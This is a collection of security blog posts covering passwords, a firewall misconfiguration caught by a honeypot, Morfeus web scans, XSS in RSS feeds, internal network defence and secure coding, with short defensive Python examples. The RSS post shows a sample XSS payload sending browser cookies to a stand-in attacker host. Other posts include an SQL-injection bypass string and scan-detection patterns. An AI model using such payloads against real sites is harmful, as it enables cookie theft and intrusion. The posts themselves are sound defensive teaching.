What Is A Good Password?

What is a good password? Well, that depends on who the password is for and what it is protecting. For a normal system user who only has access to limited amounts of information, services and software, the most important things about a password are that it is hard to guess and that the user protects it properly. What can an outsider really get at, anyway, if they have a user-level password? If the network is set up properly, an attacker can’t get to the internal network from the Internet. All they can get at are things in the DMZ like e-mail and web servers, right? And if the users are doing things right, any private, sensitive information in their e-mail messages is strongly encrypted, so even if an attacker gets into the DMZ servers, all they get is information that is ancillary at best. So, for a normal system user, the old eight-character password that uses all the different types of characters, isn’t a dictionary word, isn’t your wife’s middle name, etc. is just fine.

But, how about the folks who have system admin level access or who are granted remote access privileges? What is a good password for them? In my opinion, there is no such thing! No user name and password on their own, with no other authentication mechanism, is good enough for these levels of access. All the passwords in the world are still just something you know. You must use something you are or something you have to further authenticate yourself.

If a user has remote access privileges and their only authentication mechanism is a user name and password, what happens if those credentials are intercepted or stolen? The attacker suddenly has a way into the internal network! Then they can use that password to get at juicier tidbits of information than they could find on an e-mail server. We all know that internal networks are never as well set up and secured as external networks. But even then, the attacker will be limited to the information and services available at the user’s privilege level. Maybe the attacker can run some exploits or elevate their privileges a bit; that depends on just how poorly the internal network is secured.

But what if an attacker gets their hands on a system admin level user name and password, gets into the internal network, and there is no other authentication mechanism needed? Well, then, it’s pretty much game over! They can grab the password hashes, get at private information, set privileges, install malware, erase records of their presence; pretty much anything they want!

So, if you are a normal user, use difficult-to-guess passwords and don’t let anybody else get at them. If you are a remote user, use a strong password, but also use a token or something similar. If you are a system admin, you can’t use too many authentication mechanisms and they can’t be too strong! Use strong, long passphrases instead of simple passwords, change them every 30 days, use tokens, use positive IP checking, use software clients, use whatever you can get. But don’t just rely on your user name and password!
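To put some rough numbers behind the passphrase advice, here is a quick back-of-the-envelope sketch. The character pool and word list sizes are assumptions, and real user-chosen passwords have far less entropy than this uniform-choice model suggests, but it illustrates why a long passphrase beats a short “complex” password:

import math

def entropy_bits(pool_size: int, length: int) -> float:
    """Rough entropy estimate, assuming each element is chosen uniformly at random."""
    return length * math.log2(pool_size)

# An 8-character password drawn from ~95 printable ASCII characters
print(f"8-char password  : {entropy_bits(95, 8):.0f} bits")    # ~53 bits

# A 6-word passphrase drawn from a 7,776-word (Diceware-style) list
print(f"6-word passphrase: {entropy_bits(7776, 6):.0f} bits")   # ~78 bits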

HoneyPoint:Network Trust Agent Helps IT Team Identify Serious Network Hole

We got a great story this week from a user of HoneyPoint:Network Trust Agent (NTA). This user touched base with us to let us know how his NTA deployment on his laptop helped his security team identify a critical network hole.

His story started as usual: he had downloaded NTA after one of our conferences and installed it on his laptop. He felt very strongly that it gave him unique insights into how safe he was as he traveled around and used a variety of public Wi-Fi and other networks. Users often tell us stories of catching various worms and scans with the product as they work from coffee shops, airports and hotels. Sure enough, the logs he sent us also showed the capture of several PHP scans and some other “wormy” activity against his laptop. He added that he has become a strong believer in “when the light turns red, it is time to go”.

But, his logs also showed us something else. He confided that his laptop had “gone red” while he was using his corporate protected network. Since this was unusual, he notified his network administration team. They, in turn, inspected his laptop and pulled his NTA log. Aghast, they found that the log contained evidence that an Internet host had attempted a telnet connection to his box. That should not be possible, since the firewall should be blocking all inbound telnet attempts. After a short discussion, the admin team analyzed the firewall rules and found a misconfiguration problem. Over the previous weekend, one of the administrators had needed to allow a remote vendor to telnet into a network device for some maintenance; however, the admin in question had applied the wrong netmask to the ACL on the firewall. This had inadvertently exposed the entire internal network to telnet probes from the global public Internet!
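We don’t know the exact rule involved, but as a purely hypothetical illustration of how a single wrong netmask can turn a one-host permit rule into an “allow almost anything” rule, here is a tiny sketch using Python’s ipaddress module (the addresses are documentation-range placeholders, not the real ones):

import ipaddress

# Intended rule: permit telnet from a single vendor host (address is a placeholder)
intended = ipaddress.ip_network("203.0.113.25/255.255.255.255")
# Mistaken netmask: 255.0.0.0 instead of 255.255.255.255 turns the host entry into a /8
mistaken = ipaddress.ip_network("203.0.113.25/255.0.0.0", strict=False)

print(intended.num_addresses)   # 1          -> just the vendor box matches
print(mistaken.num_addresses)   # 16777216   -> an entire /8 now matches the permit rule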

Obviously, the admin team took immediate action to properly configure the firewall and teach the administrator in question the proper method for ACL creation. They also began to look for other signs of intrusion and to examine the logs of routers, switches and other systems that could have been exposed to compromise from the error. After they had done a careful review and knew that they were OK, they took the time to have the gentleman let us know about their experience and thank us for the helping hand. “That may be the best 10 bucks we ever spent!”, one of the team members exclaimed.

Do you have a good story about how one of the HoneyPoint products has helped you? Have you caught malicious inbound traffic on your laptop at a coffee shop? If so, let us know.

If you are interested in learning more about HoneyPoint:Network Trust Agent, Personal Edition or our critically acclaimed Security Server product for enterprises, please feel free to email us at info<_at_>microsolved.com or give us a call. We would love to talk with you about how honeypot technologies and our products in particular can help you create effective, efficient and affordable security controls throughout your environment!

Morfeus Scanner soapCaller.bs Scans

Our HoneyPoint deployments have been picking up a recently added (August 2008) scan signature from Morfeus, the bot-based web scanner that has been around for a long time. The new scans were first detected on our consumer-grade DSL/cable segments in late August and have now been seen on our corporate environment sensors as well.

The scans check for “soapCaller.bs” and then “/user/soapCaller.bs”. Returning a 200 result code did not bring any additional traffic or attacks from the original source within 96 hours of the initial scans. In fact, returning the 200 did not seem to cause any change in the behavior of the scans or any additional attacks from any source. Likely, this means that vulnerable hosts are being cataloged for later mass exploitation.
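If you want to check your own web logs for this signature, a minimal sketch along these lines would do. It assumes a common/combined log format where the client IP is the first field; the file name and helper function are hypothetical:

import re
from collections import Counter

SIGNATURE = re.compile(r'"(?:GET|POST) [^"]*soapCaller\.bs')

def morfeus_sources(log_path: str) -> Counter:
    """Count the hosts probing for the Morfeus soapCaller.bs signature."""
    sources = Counter()
    with open(log_path) as log:
        for line in log:
            if SIGNATURE.search(line):
                sources[line.split()[0]] += 1   # first field is the client IP
    return sources

for ip, hits in morfeus_sources("access.log").most_common():
    print(f"{ip}\t{hits}")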

Morfeus scans are quite prevalent and can include searches for a number of common PHP and other web application vulnerabilities. Google searches on “morfeus” return about 259,000 results, including quite a few mentions of ongoing scans from the bot-net.

Here is a blog post that discusses using .htaccess rules to block scans with the morfeus user agent.

Morfeus has shown itself to be quite adaptive and seems to be updated pretty frequently by the bot-masters with new application attack signatures. The scanning is very widespread and can be observed on a regular basis across platforms and ISP types.

The soapCaller.bs page is a file often associated with the Drupal content management system. There have been a number of vulnerabilities identified in this package in the past, including during our recent content manager testing project. Users of Drupal should be vigilant in patching their systems and in performing application assessments.

Blog Layout Plainness and Distributed, Syndicated Threats

Just got a great question about the visual layout of the blog page.

To answer the question RobM asked about why we don’t increase the “flash” of the blog page: the answer comes from marketing guru Seth Godin – we want you to focus on the signal contained in the blog posts, not the “noise” that would enter the equation if we added a bunch of screen gadgets, flair or other eye- (and attention-) grabbing stuff.

We hope that you read the blog to get information about the state of information security, technology/privacy issues and the other topics we cover here.

So, RobM, that’s the long and short of it. We want your attention to be focused on the quality of the content we deliver and nothing else. If you want to know what the latest weather forecast is, or what virus alerts or the like are going on – check out one of the many information security “portals” out there. They are very heavy on gadgets, heads-up displays and all kinds of other stuff. They certainly have their purpose, but they just present too much “noise” relative to “signal” for the vision of the MSI team.

That said, to keep this blog post more on topic than marketing strategy – have you ever considered the threats that could stem from syndication into things like portals? Imagine the cookie theft that could be performed by a rogue entry in a syndicated RSS feed or other mechanism that got wide distribution. I know this has seen a POC in the past, and I have tested more than a few RSS clients that were vulnerable to embedded XSS attacks.

One scenario that the team has discussed is the injection of XSS or the like inside of corporate feeds on the intranet. This could be a quick, easy way to gain several forms of access to a variety of internal web apps in an enterprise. Would your internal feed mechanisms catch the attack? Would your internal users be exploitable? If your organization has moved forward with embracing RSS feeds and other syndication techniques – this might be something to add to your next assessment.
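As a purely illustrative sketch of the kind of defense an internal portal or feed aggregator could apply before rendering syndicated content, consider escaping (or properly sanitizing) every item before it hits the page. The function and the hostile feed item below are made up for illustration:

import html

def render_feed_item(title: str, summary: str) -> str:
    """Escape syndicated content before dropping it into an intranet portal page.
    If the feed is allowed to carry markup, use a whitelist-based HTML sanitizer
    instead of blanket escaping."""
    return f"<h3>{html.escape(title)}</h3>\n<p>{html.escape(summary)}</p>"

# A hostile item injected into a widely syndicated feed
evil = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
print(render_feed_item("Quarterly numbers", evil))
# The script tag renders as inert text instead of executing in every reader's browser.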

Revision of Twitter Strategy

OK, I spent the last week or so working on my Twitter capability. But I have to say, after a week, Tim Ferriss’s strategy of not following people really seems to limit the capabilities that Twitter brings to the table in terms of information aggregation, conversation and leveraged crowdsourcing of ideas. So, effective now, I will start to follow key people who add good rapport, valuable information and good conversation.

Again, if you are interested in following me on Twitter, you can find me at http://www.twitter.com/lbhuston

I will continue to tweak out how I use Twitter and see if I can find a good leverage point for the tool. The more I learn, the more I will report back here, in the hopes of eventually being able to build a methodology of sorts….

Thanks again for reading the blog, tolerating the noise and being interested. Blogging and Twittering rank right up there with public speaking in my book. Being able to speak, teach and work with the public is one of the things that truly makes me “The Luckiest Guy In The World”(TM)…..

Google Trends Look at Vulnerabilities

This morning I ran a quick Google Trends look at three types of vulnerabilities: buffer overflows, SQL injections and cross-site scripting (XSS). The results are interesting to me, though certainly no shock.

You can view the graphs and data here.

What we see are spikes of interest in injections, while both XSS and buffer overflow searches remain at about the same level they have held for the last year or so. This is, of course, no surprise, given the recent spate of injection compromises, defacements and malware attacks. What is interesting to me is the news graph. I did not think it would be quite so spiky. There are a number of places where mentions in the press of both injections and XSS spike heavily. That is really good news, because it means that the mainstream press is covering those topics to a larger extent. The more mainstream press coverage the issues get, theoretically, the more awareness there should be of the topic.

Also interesting to me is that Indonesia shows up as the largest source of searches for injection and Malaysia is number 7. In XSS, Indonesia shows up at number 7, while Malaysia does not make the list. More than likely, these search results are good indicators of the research and work both countries are putting into their “hacking war”, a sort of online cyber-conflict that has been taking place for the last few years without much mainstream media attention.

South Korea shows up on all of the lists as a popular source of search activity around the vulns, and some of the other countries on the list that should be drawing interest are Iran, Israel and India. Obviously, some groups in these countries are building some cyber capabilities, as they are searching on enough data to be listed. This brings up some interesting questions.

With detailed analysis over long periods, perhaps this data would be useful for tracking the growth of capabilities in a given locale? Also, from a corporate security stance, is there any way the data could be used in the short term to provide a focal lens for risk management? How could analysis of short-term data be used to “forecast” potential areas of trouble in the near future? Does increased research of a topic area correlate with near-future attack increases in that particular vulnerability family?
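One crude way to start answering that last question would be to compute a lagged correlation between a search-interest series and your own attack counts. The numbers below are invented for illustration, not real Trends or sensor data, and the statistics.correlation call requires Python 3.10 or later:

from statistics import correlation

# Hypothetical weekly series: normalized search interest for an attack type
# and the number of matching attack attempts seen by your own sensors.
search_interest = [42, 45, 51, 60, 58, 70, 66, 73, 80, 77, 85, 90]
attack_counts   = [12, 14, 13, 19, 22, 21, 30, 28, 35, 33, 41, 44]

def lagged_correlation(interest, attacks, lag_weeks):
    """Correlate search interest with attack volume lag_weeks later."""
    if lag_weeks:
        interest, attacks = interest[:-lag_weeks], attacks[lag_weeks:]
    return correlation(interest, attacks)

for lag in range(4):
    print(f"lag {lag} week(s): r = {lagged_correlation(search_interest, attack_counts, lag):.2f}")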

Further study into gaining intelligence from Google Trends is needed. There just might be a way to tap it for insight into emerging patterns and a deeper understanding of attack type prevalence and other indicators of underground strategic changes. Only time will tell how much power we can wring from this juicy cache of information. In the meantime, play with it a bit and see what interesting stuff you can find.

Why the Fuss over Securing My Internal Network?

I’ve often heard folks downplay the importance of securing their internal network, indicating that the real threat is from the outside, from external attackers, so why expend the effort?

When we think of threats, we often recall the many stories of Internet attackers who gain access through Internet-facing systems and wreak havoc by stealing information from an externally facing account, defacing websites, or causing denial of service. While these are serious threats, I think we need to look deeper into the risk side of the problem and examine the more critical potential for harm to the organization.

Internal systems are, by their nature, easily accessible to employees in order to make daily work easy and efficient. Employees are for the most part trusted on the internal side and given free rein within that domain. While some level of trust is required to allow work to be completed, I believe that too much free rein creates unnecessary and unacceptable risk.

An internal attacker given too much free rein on a network can cause serious damage to an organization. Just take a look at the recent case in the city of San Francisco, where a rogue system administrator brought the city network to its knees. We all know this threat is real; while somewhat rare, it is a possibility, and we need to provide some level of protection against it by implementing security measures on the internal side. This is the scenario I believe most people point to when justifying internal network security, but its relative rarity decreases our sense of urgency to act.

Despite the threat from a rogue insider, I would like to highlight an even more likely scenario that I believe makes a greater case for internal network security: an external attacker who gains credentials or permissions on the internal network. Many factors have significantly increased this threat in the past several years. The rampant use of remote access from outside the organization (VNC, VPN) and of mobile devices opens up a huge array of avenues for these types of attacks. The sophistication of client-side attack tools, weak authentication credentials and social engineering, combined with the dizzying pace of keeping up with vulnerability patches, leave our network defenses only one hack away from an internal breach. Once inside the network, an attacker may have all the free rein your trusted employees do. If you weren’t attentive to internal security, you could be in for serious trouble.

I assert that we should all assume the attack from the inside WILL happen at some point and make preparations for that eventuality. To do that, I think you should consider a few broad recommendations:

1. Identify the sensitive information on your network and where it resides.
2. Determine who needs access to that information to do their job.
3. Compartmentalize the information and restrict access to only those who need to know it (a toy sketch of this idea follows the list).
4. Consider strategic implementations like anonymization, so that sensitive data is not presented where it is not necessary.
5. Implement strong and redundant access controls, particularly for credentials that have wide-ranging access such as sysadmin accounts.
6. Don’t relax your high standards for access control and auditing on the internal network, and don’t assume they are there only to guard against your trusted employees.
7. Independently test your systems regularly to keep yourself honest in assessing your risk.
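As a toy sketch of item 3 above, the idea is a default-deny, need-to-know check in front of each class of sensitive data rather than flat internal trust. The roles and data classes here are made up:

# Hypothetical mapping of sensitive data classes to the roles that need them
SENSITIVE_DATA_ACL = {
    "payroll":      {"hr_manager", "payroll_clerk"},
    "source_code":  {"developer", "build_system"},
    "customer_pii": {"support_lead", "billing"},
}

def can_access(role: str, data_class: str) -> bool:
    """Default deny: allow access only if the role is explicitly granted for the data class."""
    return role in SENSITIVE_DATA_ACL.get(data_class, set())

assert can_access("payroll_clerk", "payroll")
assert not can_access("developer", "customer_pii")   # being "internal" is not enough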

In summary, I suggest folks think differently about their internal networks – not as a completely secured safe zone where we can relax our defenses. Consider establishing point defenses around each sensitive system, protecting it not only from the outside, but from within as well. Your inside attacker will likely be an outsider. Assume it WILL happen, and be prepared to minimize the damage when it does.

A Taste of Our Own Medicine…Real Life DR/BC Experience for the Assessors

It has been a turbulent last few days around MSI and in Central Ohio at large. On Sunday, we experienced the leftovers of Hurricane Ike. Being in the Midwest, we were not quite prepared for what came our way. Wide swaths of the state experienced winds as high as those associated with a minor hurricane or tropical storm. Hundreds of thousands were left without power, and damage to homes and property took a heavy toll. While the damage to our area was a minor issue compared to the beating that Houston and parts of Texas took – it was, nevertheless, a major event for us.

Today is 3 full days after the storm event here in Columbus and many remain without power and other “conveniences”. Grocery stores, gas stations and restaurants are just beginning to reopen in many parts of the city. Problems with various services and businesses abound. For example, many schools are still closed, several doctor and dentist offices still have no power and there are ongoing ups and downs for telephone services and ISPs.

Around MSI, we have been fighting the damage from the storm and Mr. Murphy. While we have been among the lucky ones to keep power on a stable basis, many of our team have been spending long hours in the conference room watching TV and playing video games after business hours. Many of them have no electricity at home, so this seems to be an easy way for them to spend some time. Our ISP has had two outages in the last two days. One was around 5 hours, due to a power failure in some of the equipment that manages the “last mile”; the other was less than an hour this morning, when the generator for their local data center developed an oil leak. Thankfully, both were repaired within the SLA and neither interfered with our progress on engagements.

We have prepped our warm site for extended outages, and just as we were about to activate it for these ISP outages, the connectivity returned. We have learned some lessons over the last couple of days about dealing with email outages and web presence outages, and we certainly gained some deeper insight into a few slight dependencies that had escaped us, even during our twice-yearly DR testing. We still have some kinks to work out, but thankfully, our plans and practice paid off. We were prepared, the team knew our SLA windows for our vendors and our clients, and our processes for ensuring continuation of engagements worked well!

We got to know first hand, exactly how good prep and good processes for DR/BC pay off. We took our own medicine and the taste wasn’t all that bad.

The moral of the story, I guess, is that DR/BC is a very worthwhile process. So the next time we are doing an assessment for you and ask some tough questions about yours – don’t take it personally – as we said, we have learned first hand just how worthwhile the front-end investment can be.

Learn more about the storm:

News about the storm here.

American Electric Power outage map.

Local news.

PS – Special thanks to the folks who signed up for the State of the Threat presentation this morning. Sorry for the need to postpone it. We worked with Platform Labs throughout the day yesterday attempting to coordinate the event, but at the end of the day they still had no power. Thus, the postponement. Thanks for your patience and understanding on the issue. The good news is that Steve at Platform says they are back up and running as of this morning! Good news for Steve and everyone else!

“Secure Code” Will Save Us — Right????????

I know we have always preached that application security is much more cost effective when it is baked in. But the reality of today’s application horizon is that security is an afterthought, at best, for the majority of web applications. A variety of reasons, ranging from inexperienced developers to legacy technologies and from apathetic customers to security issues in core technologies, have made this so. In fact, in our application security testing services we often encounter applications in production environments that fail to protect against attacks from 10 years ago!

The average development team we work with seems interested in fixing the problems, but often lacks a basic understanding of how common attacks like SQL injection and XSS work. Without a basic understanding of the threats, how on earth can they be expected to protect against them? Recently, we spent more than four hours explaining the whitelist vs. blacklist approaches to a certain development team who shall remain nameless. It took almost half a day of conference calls and email exchanges for them to understand how these basic approaches to filtering user input could be employed to protect their application against input validation attacks. It was not that they were not trying. The problem seemed to be that their application was developed by a small group of intern-level programmers, and the team members with real programming experience (the one(s) who had done the engineering and application design) were long since gone from the company or reassigned to other projects. Without experienced oversight and guidance, the interns had produced working code, for sure, but without any underlying controls for security, availability or reliability!
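For readers in the same boat as that team, here is a minimal sketch of the difference between the two approaches. The field format, patterns and bypass string are made up for illustration; a real whitelist should be derived from the application’s actual data model:

import re

# Blacklist: try to enumerate "bad" input. Easy to bypass with encodings,
# comment tricks or vectors nobody has thought of yet.
BAD_PATTERNS = re.compile(r"(--|;|'|<script|union\s+select)", re.IGNORECASE)

def blacklist_ok(value: str) -> bool:
    return not BAD_PATTERNS.search(value)

# Whitelist: define exactly what "good" looks like and reject everything else.
CUSTOMER_ID = re.compile(r"^[A-Z]{2}\d{6}$")   # hypothetical field format

def whitelist_ok(value: str) -> bool:
    return bool(CUSTOMER_ID.fullmatch(value))

print(blacklist_ok("AB123456"))                     # True
print(blacklist_ok("1 UNION/**/SELECT password"))   # True  -- slips past the blacklist
print(whitelist_ok("1 UNION/**/SELECT password"))   # False -- rejected by the whitelist
print(whitelist_ok("AB123456"))                     # True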

Today, if we look at the marketplace, there are a ton of solutions attempting to bolt on security after the fact. Everything from code scanners to web application firewalls is emerging as a control to help organizations deal with web application security. One of the big problems with these technologies is that many of them require changes to the underlying source code, logic or web server environment. Even a WAF, which at least acts as a filtering device at the protocol layer, can make many applications perform unreliably when it is “protecting” them. What we really need is a reliable way to add security to web applications without changes to protocols, environments or logic.

Of course, the ultimate argument is that what we really need is secure code. I have read a lot of security pundits lately talking about how “secure code” is the solution. “Secure code” has become the latest battle cry, silver bullet, smoke-and-mirrors trick and marketing hype. However, “secure coding” is not easy. It is not immediately available to most organizations – there is no switch to flip on your developers to make them churn out “secure code”, and there is no ONE class or seminar you can send them to that will make them write “secure code”. Instead, it takes ongoing education and updates to existing code, tools, frameworks and development environments. It will be a long, slow process. It will be a human process, and it will be expensive.

Even then, once we get all of our programmers making “secure code”, there will still be problems. New attack formats will arrive. Legacy applications will still have old issues – some may be rewritten, but it won’t be cost effective for all web applications. New technologies and web enhancements will certainly degrade the security posture of even today’s most hardened web application. In other words – as you have heard me say before – Security is a journey, not a destination. We won’t get all of our code secure. We will never cross the line when all web apps are safe. We will simply move closer to a time when a majority of web applications are secure enough to meet our level of risk tolerance. Even then, that moment is likely fleeting. The center will not hold. The universe breaks down upon itself. Entropy is a true constant in the universe, even the security universe. The center will just not hold……

Want More Random Content and Noise in Your Life?

For those of you who want more random noise and content but just can’t get enough of it on the web, I have decided to take up this “Twitter thing”. 😉

Everyone keeps telling me that I need to do it, so I am trying hard to embrace it.

If you are interested in “following me” you can do so here: http://twitter.com/lbhuston

Two caveats: 1. There is likely to be a random element to the content and frequency of the feed. 2. There is likely to be a mix of personal stuff, marketing, security thoughts, musings, rants, etc. The Twitter-sphere seems to encourage this mixture of transparency and actual deep thinking about work.

Lastly, I have decided to follow only two people thus far: Guy Kawasaki and Timothy Ferriss – two of my favorite authors. That said, if you don’t see me following you directly, please excuse me ahead of time rather than taking offense. So far, keeping up with the tweets from those two, attempting to add my own content and doing the day-to-day work of leading MSI seems to be consuming all of the cycles I have, so please don’t take it personally if I don’t follow you in return….

OK that’s about it for this post. If the last thing you would want in your life is more Brent Huston, don’t feel bad or anything. Believe me, I understand. 🙂

BTW – If you want to check out books by those two authors, they are both excellent. Their books have helped me build MSI and have even helped me gain some level of illusion of control over my personal life.